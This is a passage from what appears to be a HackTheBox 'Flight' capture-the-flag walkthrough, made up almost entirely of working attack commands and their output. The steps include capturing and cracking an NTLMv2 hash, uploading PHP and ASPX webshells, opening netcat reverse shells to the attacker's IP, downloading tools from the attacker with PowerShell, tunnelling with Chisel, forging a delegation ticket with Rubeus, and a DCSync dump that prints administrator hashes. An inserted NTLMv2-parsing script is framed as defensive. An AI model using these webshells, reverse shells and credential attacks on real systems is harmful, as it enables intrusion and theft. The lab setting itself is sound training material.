NT_STATUS_ACCESS_DENIED opening remote file \puck.rtf
NT_STATUS_ACCESS_DENIED opening remote file \puck.lnk
putting file puck.jnlp as \puck.jnlp (5.8 kb/s) (average 20.6 kb/s)
putting file desktop.ini as \desktop.ini (1.4 kb/s) (average 15.9 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \puck-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \puck.htm
NT_STATUS_ACCESS_DENIED opening remote file \puck-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \puck.asx
NT_STATUS_ACCESS_DENIED opening remote file \puck.pdf
NT_STATUS_ACCESS_DENIED opening remote file \puck-(frameset).docx
putting file puck-(fulldocx).xml as \puck-(fulldocx).xml (1243.6 kb/s) (average 398.3 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \puck.m3u
NT_STATUS_ACCESS_DENIED opening remote file \puck-(url).url
smb: \> ls
. D 0 Fri Mar 14 23:27:19 2025
.. D 0 Fri Mar 14 23:27:19 2025
desktop.ini A 46 Fri Mar 14 23:27:19 2025
puck-(fulldocx).xml A 72584 Fri Mar 14 23:27:19 2025
puck-(stylesheet).xml A 162 Fri Mar 14 23:27:19 2025
puck.application A 1649 Fri Mar 14 23:27:19 2025
puck.jnlp A 191 Fri Mar 14 23:27:19 2025
5056511 blocks of size 4096. 1248814 blocks available
smb: \>
Interestingly, a bunch are blocked. But a few do make it.
Responder
With responder still running, after a minute or two there’s a hit from C.Bum:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:952d95ad...
Crack NetNTLMv2
john with rockyou will quickly return the password “Tikkycoll_431012284”:
┌──(puck㉿kali)-[~/htb/flight]
└─$ john c.bum-net-ntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Tikkycoll_431012284 (c.bum)
1g 0:00:00:03 DONE (2025-03-14 16:33) 0.3003g/s 3164Kp/s 3164Kc/s 3164KC/s TinyMutt69..Thehunter22
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
It works:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u c.bum -p 'Tikkycoll_431012284'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
Shell as svc_apache
Webshell
SMB
C.Bum has write access to the Web share:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nxc smb flight.htb -u c.bum -p 'Tikkycoll_431012284' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ,WRITE
Upload Webshell
I’ll start with a standard webshell, shell.php:
<?php system($_REQUEST['cmd']); ?>
I’ll move into the styles directory in school.flight.htb, and upload it there:
┌──(puck㉿kali)-[~/htb/flight]
└─$ smbclient //flight.htb/web -U c.bum 'Tikkycoll_431012284'
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Mar 14 23:37:14 2025
.. D 0 Fri Mar 14 23:37:14 2025
flight.htb D 0 Fri Mar 14 23:37:00 2025
school.flight.htb D 0 Fri Mar 14 23:37:00 2025
5056511 blocks of size 4096. 1248132 blocks available
smb: \> cd school.flight.htb
smb: \school.flight.htb\> ls
. D 0 Fri Mar 14 23:42:00 2025
.. D 0 Fri Mar 14 23:42:00 2025
about.html A 1689 Tue Oct 25 05:54:45 2022
blog.html A 3618 Tue Oct 25 05:53:59 2022
home.html A 2683 Tue Oct 25 05:56:58 2022
images D 0 Fri Mar 14 23:42:00 2025
index.php A 2092 Thu Oct 27 09:59:25 2022
lfi.html A 179 Thu Oct 27 09:55:16 2022
styles D 0 Fri Mar 14 23:42:00 2025
5056511 blocks of size 4096. 1248132 blocks available
smb: \school.flight.htb\> cd styles
smb: \school.flight.htb\styles\> ls
. D 0 Fri Mar 14 23:42:00 2025
.. D 0 Fri Mar 14 23:42:00 2025
ie6.css A 587 Fri Dec 2 20:42:00 2011
style.css A 11045 Wed Jan 25 21:17:32 2012
5056511 blocks of size 4096. 1248132 blocks available
smb: \school.flight.htb\styles\> put shell.php
putting file shell.php as \school.flight.htb\styles\shell.php (1.2 kb/s) (average 1.2 kb/s)
smb: \school.flight.htb\styles\> ls
. D 0 Fri Mar 14 23:42:47 2025
.. D 0 Fri Mar 14 23:42:47 2025
ie6.css A 587 Fri Dec 2 20:42:00 2011
shell.php A 36 Fri Mar 14 23:42:47 2025
style.css A 11045 Wed Jan 25 21:17:32 2012
5056511 blocks of size 4096. 1248132 blocks available
smb: \school.flight.htb\styles\>
I’m using styles just to be a bit more hidden. The webshell works:
┌──(puck㉿kali)-[~/htb/flight]
└─$ curl school.flight.htb/styles/shell.php?cmd=whoami
flight\svc_apache
Shell
To go from webshell to shell, I’ll upload nc64.exe to the same folder:
smb: \school.flight.htb\styles\> put nc64.exe nc64.exe
putting file nc64.exe as \school.flight.htb\styles\nc64.exe (99.6 kb/s) (average 99.6 kb/s)
Now I’ll invoke it over the webshell:
puck@kali$ curl -G school.flight.htb/styles/shell.php --data-urlencode 'cmd=nc64.exe -e cmd.exe 10.10.14.4 443'
It hangs, but at a nc listener there’s a shell:
┌──(puck㉿kali)-[~/htb/flight]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.187] 50027
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\school.flight.htb\styles>whoami
whoami
flight\svc_apache

C:\xampp\htdocs\school.flight.htb\styles>
Shell as C.Bum
Enumeration
File System
As svc_apache, there’s not much I didn’t already have access to over SMB. The web directories sit at C:\xampp\htdocs, which is common for an XAMPP deployment on Windows.
There is an inetpub directory at the root of C:\. That’s the directory IIS typically runs from:
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 163B-E248
Directory of C:\
10/25/2022 06:22 PM <DIR> inetpub
06/07/2022 06:39 AM <DIR> PerfLogs
10/21/2022 11:49 AM <DIR> Program Files
07/20/2021 12:23 PM <DIR> Program Files (x86)
10/25/2022 05:49 PM <DIR> Shared
09/22/2022 12:28 PM <DIR> StorageReports
09/22/2022 01:16 PM <DIR> Users
10/21/2022 11:52 AM <DIR> Windows
09/22/2022 01:16 PM <DIR> xampp
0 File(s) 0 bytes
9 Dir(s) 15,360,438,272 bytes free
The wwwroot directory (the default server, kind of like html in /var/www with Apache on Linux) has the default stuff in it:
C:\inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is 163B-E248
Directory of C:\inetpub\wwwroot
09/22/2022 12:28 PM <DIR> .
09/22/2022 12:28 PM <DIR> ..
09/22/2022 12:28 PM <DIR> aspnet_client
09/22/2022 12:24 PM 703 iisstart.htm
09/22/2022 12:24 PM 99,710 iisstart.png
2 File(s) 100,413 bytes
3 Dir(s) 15,360,327,680 bytes free
But there is a development
directory that looks to have a real website in it:
C:\inetpub\development>dir
Volume in drive C has no label.
Volume Serial Number is 163B-E248
Directory of C:\inetpub\development
10/25/2022 06:22 PM <DIR> .
10/25/2022 06:22 PM <DIR> ..
04/16/2018 02:23 PM 9,371 contact.html
10/25/2022 06:22 PM <DIR> css
10/25/2022 06:22 PM <DIR> fonts
10/25/2022 06:22 PM <DIR> img
04/16/2018 02:23 PM 45,949 index.html
10/25/2022 06:22 PM <DIR> js
2 File(s) 55,320 bytes
6 Dir(s) 15,360,327,680 bytes free
The development directory can be written to by C.Bum:
C:\inetpub>icacls development
development flight\C.Bum:(OI)(CI)(W)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
Network
Looking at the listening ports, there are a lot as is standard on any DC:
C:\xampp\htdocs\school.flight.htb\styles>netstat -ano | findstr LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 5328
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 968
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 5328
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 968
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 676
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING 2876
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
...[snip]...
I’m particularly interested in the ones that I can’t reach from my VM, like 8000 (maybe the development site?).
C.Bum
C.Bum is a member of the WebDevs group, but not the Remote Users group:
C:\>net user C.Bum
User name C.Bum
Full Name
Comment Senior Web Developer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/22/2022 1:08:22 PM
Password expires Never
Password changeable 9/23/2022 1:08:22 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/22/2022 2:50:24 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *WebDevs
The command completed successfully.
This means I can’t use WinRM to execute commands as C.Bum in PowerShell.
RunasCs
The RunasCs project aims to create a binary like runas.exe but without limitations:
- Allows explicit credentials
- Works both if spawned from interactive process and from service process
- Manage properly DACL for Window Stations and Desktop for the creation of the new process
- Uses more reliable create process functions like CreateProcessAsUser() and CreateProcessWithTokenW() if the calling process holds the required privileges (automatic detection)
- Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)
- Allows to bypass UAC when an administrator password is known (flag --bypass-uac)
- Allows redirecting stdin, stdout and stderr to a remote host
- It’s Open Source 🙂
It’s from one of the authors of the Potato exploits, and a really nice tool to have.
I’ll download the latest release, host it with a Python web server, and upload it to Flight:
C:\ProgramData>powershell -c wget 10.10.14.3:8000/RunasCs.exe -outfile r.exe
Now I’ll invoke cmd.exe as C.Bum, using -r to redirect STDIN/STDOUT to my host:
C:\ProgramData>.\r.exe C.Bum Tikkycoll_431012284 -r 10.10.14.3:443 cmd
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-5ea78$\Default
[+] Async process 'cmd' with pid 4508 created and left in background.
C:\ProgramData>
With nc listening on my box, there’s a connection:
┌──(puck㉿kali)-[~/htb/flight]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.187] 50043
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
flight\c.bum
C:\Windows\system32>
I can now get user.txt:
C:\Users\C.Bum\Desktop>type user.txt
45d7ff00d8e8********************
Shell as defaultapppool
Enumeration
Tunnel
I’ll take a look at the development website. To do this, I’ll upload Chisel:
C:\ProgramData>powershell -c wget 10.10.14.3:8000/chisel.exe -outfile c.exe
Now I’ll start the server on my VM:
┌──(puck㉿kali)-[~/htb/flight]
└─$ chisel server -p 8000 --reverse
2025/03/21 02:56:18 server: Reverse tunnelling enabled
2025/03/21 02:56:18 server: Fingerprint 30mcEyeiYU0qX9+F3KqwQ2z0ArRnPkDC3B+7iKM5i5s=
2025/03/21 02:56:18 server: Listening on http://0.0.0.0:8000
I use -p 8000 to listen on 8000 (the default port of 8080 is already in use by Burp), and give it --reverse to allow incoming connections to open listeners on my host that tunnel back through them.
I’ll connect from Flight, tunneling port 8001 on my host through the tunnel to 8000 on Flight:
c:\ProgramData>.\c client 10.10.14.3:8000 R:8001:127.0.0.1:8000
.\c client 10.10.14.3:8000 R:8001:127.0.0.1:8000
2025/03/20 18:57:10 client: Connecting to ws://10.10.14.3:8000
2025/03/20 18:57:10 client: Connected (Latency 10.1468ms)
Site
Visiting http://127.0.0.1:8001 in Firefox returns another site:
Nothing useful on the page. There’s a /contact.html that doesn’t have any useful information either.
Tech Stack
The response headers show that the site is hosted by IIS (rather than Apache):
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 16 Apr 2018 21:23:22 GMT
Accept-Ranges: bytes
ETag: "019c25c9d5d31:0"
Server: Microsoft-IIS/10.0
X-Powered-By: ASP.NET
Date: Wed, 26 Oct 2022 01:47:57 GMT
Connection: close
Content-Length: 9371
They also show X-Powered-By: ASP.NET. Typically that means that .aspx type pages are in use.
WebShell
Write File
I’ll remember that C.Bum should have write access to this directory. I’ll test that out with a dummy file:
C:\inetpub\development>echo "test" > puck.txt
The text loads:
ASPX Echo
To see if ASPX code will run, I’ll create a silly ASPX file that writes a string, poc.aspx:
<% Response.Write("puck was here") %>
I’ll upload that over SMB, and then copy it into the development directory:
C:\inetpub\development>copy \xampp\htdocs\poc.aspx .
1 file(s) copied.
On visiting the page, it works:
Webshell
To run commands, I’ll download this aspx webshell from GitHub, upload it over SMB, and copy it into place:
c:\inetpub\development\development>powershell -c wget 10.10.14.3/cmd.aspx -outfile cmd.aspx
powershell -c wget 10.10.14.3/cmd.aspx -outfile cmd.aspx
c:\inetpub\development\development>
Loading the page shows a form:

Clicking “Run” shows the output below:
Shell
My copy of nc64.exe has long been wiped by resets, but I’ll upload it back to \programdata,
c:\inetpub\development\development>powershell -c wget 10.10.14.3/nc64.exe -outfile c:\programdata\nc64.exe
and then execute it via the cmd.aspx webshell:
/c c:\programdata\nc64.exe 10.10.14.3 443 -e cmd
At my nc listener, I get a shell as defaultapppool:
┌──(puck㉿kali)-[~/htb]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.187] 51778
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
Shell as administrator
Strategy
iis apppool\defaultapppool is a Microsoft Virtual Account. One thing about these accounts is that when they authenticate over the network, they do so as the machine account. For example, if I start responder and then try to open an SMB share on it (net use \\10.10.14.6\doesntmatter), the account I see trying to authenticate is flight\G0$:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.11.187
[SMB] NTLMv2-SSP Username : flight\G0$
[SMB] NTLMv2-SSP Hash : G0$::flight:1e589bf41238cf8e:...[snip]...
I won’t be able to crack that NetNTLMv2 because the machine accounts use long random passwords. But it does show that the defaultapppool account is authenticating as the machine account.
To abuse this, I’ll just ask the machine for a ticket for the machine account over the network. I showed this same attack as an unintended method in PivotAPI.
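To make the captured line concrete, here is a parser for the NTLMv2-SSP format Responder prints (USER::DOMAIN:server_challenge:NTProofStr:blob), with the blob decoded according to the NTLMv2_CLIENT_CHALLENGE layout from MS-NLMP. This is an added example, not code from the writeup or from Responder; the sample line is constructed (the server challenge is the one shown above, the NTProofStr, client challenge, timestamp and AV pairs are made up). For a defender the useful part is the blob: it carries the client's own timestamp and the NetBIOS/DNS names of the target it was handed, so a capture like this identifies which host authenticated to what. The NTProofStr is an HMAC-MD5 keyed by the account's NT hash, which is why a machine account's long random password makes it uncrackable in practice.

```python
import struct
from datetime import datetime, timedelta, timezone

# MS-NLMP AV_PAIR ids that appear in the NTLMv2 client challenge blob.
AV_IDS = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 9: "MsvAvTargetName",
}
STRING_AVS = {1, 2, 3, 4, 5, 9}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def build_av_pairs(pairs):
    """Encode (av_id, text) tuples as AV_PAIRs and terminate with MsvAvEOL."""
    out = b""
    for av_id, text in pairs:
        data = text.encode("utf-16-le")
        out += struct.pack("<HH", av_id, len(data)) + data
    return out + struct.pack("<HH", 0, 0)


def build_blob(timestamp: datetime, client_challenge: bytes, av_pairs: bytes) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: RespType, HiRespType, 6 reserved bytes, FILETIME,
    8-byte client challenge, 4 reserved bytes, AV_PAIRs, 4 trailing zero bytes."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", datetime_to_filetime(timestamp))
            + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4)


def parse_ntlmv2_line(line: str) -> dict:
    """Parse USER::DOMAIN:server_challenge:NTProofStr:blob as printed by Responder."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01" or len(nt_proof) != 32 or len(server_challenge) != 16:
        raise ValueError("not an NTLMv2 response line")
    (ft,) = struct.unpack_from("<Q", blob, 8)
    client_challenge = blob[16:24]
    av, off = {}, 28
    while True:                                   # walk AV_PAIRs until MsvAvEOL
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:
            break
        raw = blob[off:off + av_len]
        off += av_len
        name = AV_IDS.get(av_id, f"MsvAv{av_id}")
        if av_id in STRING_AVS:
            av[name] = raw.decode("utf-16-le")
        elif av_id == 7:
            av[name] = filetime_to_datetime(struct.unpack("<Q", raw)[0])
        else:
            av[name] = raw.hex()
    return {
        "user": user, "domain": domain,
        "machine_account": user.endswith("$"),   # trailing $ = computer account
        "server_challenge": server_challenge, "nt_proof": nt_proof,
        "timestamp": filetime_to_datetime(ft),
        "client_challenge": client_challenge.hex(),
        "av_pairs": av,
    }


# Constructed sample: the server challenge is the one Responder printed above; the
# NTProofStr, client challenge, timestamp and AV pairs are made up for this example.
SAMPLE_TIME = datetime(2025, 3, 21, 2, 31, 7, tzinfo=timezone.utc)
SAMPLE_BLOB = build_blob(
    SAMPLE_TIME,
    bytes.fromhex("0011223344556677"),
    build_av_pairs([(2, "FLIGHT"), (1, "G0"), (4, "flight.htb"), (3, "g0.flight.htb")]),
)
SAMPLE_LINE = "G0$::flight:1e589bf41238cf8e:" + "ab" * 16 + ":" + SAMPLE_BLOB.hex()

if __name__ == "__main__":
    for key, value in parse_ntlmv2_line(SAMPLE_LINE).items():
        print(f"{key:>16}: {value}")
```

The parser stops at MsvAvEOL and leaves the 4 trailing bytes alone, which is what a real capture from a Windows client looks like; if a line fails the length checks it is not an NTLMv2 response and should not be fed to anything downstream.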
Get Ticket
Upload Rubeus
Rather than compile it myself, I’ll grab the latest compiled version of the binary from SharpCollection. I’ll host it with Python HTTP, and upload it to Flight:
c:\ProgramData>powershell wget 10.10.14.3:8000/Rubeus.exe -outfile rubeus.exe
Generate Ticket
To create a ticket, I’ll use the tgtdeleg command:
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>cd c:\programdata
cd c:\programdata
c:\ProgramData>.\rubeus.exe tgtdeleg /nowrap
.\rubeus.exe tgtdeleg /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: 0bDamHJs2SjKKtAP1mRuzqikYdtu2QKPe186mdGmuZY=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECmUGjzcbRS251O4bGQhhVU+GHvop38Uz8nMuzz17wzLwPwzsuTQVpAWadIo1vwjhsQwf5rbfodxKvfqAhtheuHJipS9xRvn7s7kXPNaRespxog61LVEOKBgh4KtS+oFh78+2G2X5MUFmHlKSCUaT1m+aRN64UiS49s+n+IhQhfOeCnhWSnt9b6pLo+IJ8tLhiGenlaMjqqWEtNbfNLOCviULWWj3KTN9ZQueXKioJs+paDemtT1XXq22kHt4A+vGKMcThrisuBBNbSyfV/MKH4Ln+ivenXOJNTbTJQU2Z5tGg8rIsyzVun1trPv1XGfjrIcMGdchR8CeNN4b1jJRXYaefxsU1jtSy5utvzFtuwEtlBSjZm1tD8ZAyAZbuJ1zqVz/Bc/W7LXSb1enRP6uATPqnwALsk/ZerKcsmYDBFHjBrNzdsUcaJV6dgQIMomwHQZ08pl5UmGE99H8qAi5Gsx7QMmieij4OQbN73UBsfP1tXyJXB3077c5Nl/HpKwZ17mn3BIFaptxKVukErC0qlm71183K/3ALJJ6UIO3aPLBjiukdkElMqAjjFwnrhDoaNr1APgAPtms1+i7ya/7b/zR6/jlLTbXwcZlK3dlgRhJJN/70HGPmNCYqzLnFe6pwrw48KstgUe+F30KeWuWyMApH/zko/AcwMOyJ6v9sn55knL+ixyAjL/PyssJBMPcITScGiw9FpIo0S4sQ5SJROBovYJpxADquHotNLhAum4dXpWXisg3inXFIV5QfD4xaD79wW+0yYi+PEKAyudLwd27XnlNAbcQfT2fX6L2yKPaB/eIYREoqFe35xXhJ685MvSmNt9b7VJmeDCzGEnVhfLrN/IB+4JL3H2/h6VlsY4PSaKBHoXCopxZSfTdX+wAD9COR2J8SyTzTe9VWkgfED2hED20Rdei5un7Sksx4QNyYxvVaEJCcDVJAZ/sfptgxRQ0A3VbdhJh6nKh5+Z/axxyzRgfkQem4Bqtjpgdc06WVLqUmOYZBVwyrsV1OUI33OCByuZcSZnpnrYsDjrCIA/HEOLJPFJyp8tcacL9xJYpPZ6RESHzWf7Lz7pGWIue2DMoXITzOnTxtBiJAm1Hya3Juqk0vC1yg9mqRC6ZNOwt0DfEGqfRBRcR5ryH/Wr6uoPVpAg3MKD2VYJoYuMua+FmdPFT9D4ItxVRY6bDS1RQN0mnhvLyhQjaSGoRvPvOGFAyv38aeMccegZaYseb5x52hX8GQxg82LCUjznZXubreDyeC3KrfxXpEb/46NevNyQmWFPP1Unas+isAkponCAXmJsSPon/nd719ZnEy6rYqwzDsnibOwlBHmxriS+Kp6UaDaqw7+lQBfjReQihtJFz0aTzquiczIQKo4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQgipnYnT3hLPnvxaegn6bto0XfXYgm0dnq3suao30wH8ChDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI1MDMyMTAyMzEwN1qmERgPMjAyNTAzMjExMjMxMDdapxEYDzIwMjUwMzI4MDIzMTA3WqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC
c:\ProgramData>
DCSync
Configure Kerberos Ticket
With a ticket for the machine account, I can do a DCSync attack, effectively telling the DC that I’d like to replicate all the information in it to myself. To do that, I’ll need to configure Kerberos on my VM to use the ticket I just dumped.
I’ll decode the base64 ticket and save it as ticket.kirbi. Then kirbi2ccache will convert it to the format needed by my Linux system:
┌──(puck㉿kali)-[~/htb/flight]
└─$ python3 kirbi2ccache.py
usage: kirbi2ccache.py [-h] [-v] kirbi ccache
kirbi2ccache.py: error: the following arguments are required: kirbi, ccache
┌──(puck㉿kali)-[~/htb/flight]
└─$ python3 kirbi2ccache.py ticket.kirbi ticket.ccache
INFO:root:Parsing kirbi file /home/puck/htb/flight/ticket.kirbi
INFO:root:Done!
Now I’ll export the environment variable to hold that ticket:
puck@kali$ export KRB5CCNAME=ticket.ccache
Time Issues
It’s really common when doing these kinds of attacks to run into time issues. When I run secretsdump.py from Impacket to dump all the hashes from the DC, it fails:
puck@kali$ impacket-secretsdump -k -no-pass g0.flight.htb
Impacket v0.10.1.dev1+20220720.103933.3c6713e - Copyright 2022 SecureAuth Corporation
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...
It suggests adding -just-dc-user:
-just-dc-user USERNAME Extract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch
I’ll go for administrator, but it still fails:
puck@kali$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.10.1.dev1+20220720.103933.3c6713e - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
Here’s the real issue: KRB_AP_ERR_SKEW.
Fix Time
I’ll fix the time with ntpdate, telling it to set my time to the NTP server on Flight:
puck@kali$ sudo ntpdate -s flight.htb
This will likely drop my VPN connection, but after reconnecting, I can dump the hashes:
┌──(puck㉿kali)-[~/htb/flight]
└─$ nano ticket2.kirbi
┌──(puck㉿kali)-[~/htb/flight]
└─$ python3 kirbi2ccache.py ticket2.kirbi ticket2.ccache
INFO:root:Parsing kirbi file /home/puck/htb/flight/ticket2.kirbi
INFO:root:Done!
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[-] RemoteOperations failed: invalid principal syntax
[*] Cleaning up...
┌──(puck㉿kali)-[~/htb/flight]
└─$ export KRB5CCNAME=ticket2.ccache
┌──(puck㉿kali)-[~/htb/flight]
└─$ klist
Ticket cache: FILE:ticket2.ccache
Default principal: G0$@FLIGHT.HTB
Valid starting Expires Service principal
03/21/2025 03:31:07 03/21/2025 13:31:07 krbtgt/FLIGHT.HTB@FLIGHT.HTB
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...
┌──(puck㉿kali)-[~/htb/flight]
It works now without -just-dc-user as well:
┌──(puck㉿kali)-[~/htb/flight]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
